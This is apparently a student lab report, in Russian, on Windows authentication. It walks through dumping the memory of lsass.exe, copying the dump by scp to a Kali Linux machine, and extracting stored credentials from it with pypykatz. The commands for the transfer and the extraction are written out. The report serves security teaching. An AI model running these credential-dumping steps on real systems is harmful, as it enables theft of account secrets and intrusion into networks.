# Практическая работа №3 *ААА в Windows* --- # Занятие 3 - *ААА в Windows* # Задание: 1) Проанализировать память процесса lsass.exe ## Часть 1. Анализ памяти Lsass.exe #### 1.1 Зашли под учётной записью Ольги и обращаемся к ресурсам домена  #### 1.2 Заходим под учётной записью Петра и открываем командную строку от имени администратора, введя данные админа  #### 1.3 Узнаем кто мы в системе командой whoami  #### 1.4 Запускаем диспетчер задач от имени администратора и вводим данные учётной записи админа  #### 1.5 В подробностях находим процесс lsass.exe и делаем дамп этого процесса  #### 1.6 Файл дампа создан  #### 1.7 Заходим в kali linux и включаем подключение по ssh  #### 1.8 Передаём файл дампа, созданный ранее на нашу kali linux ```bash= scp C:\Users\ADMpetr\AppData\Local\Temp\lsass.DMP kali@192.168.10.6:/home/kali ```  #### 1.9 Убеждаемся, что файл передался  #### 1.10 Выполняем скрипт Для начала скачиваем скрипт с репозитория ```bash= git clone <https://github.com/skelsec/pypykatz ``` Затем запускаем скрипт ```bash= pypykatz lsa minidump /home/kali/lsass.DMP ```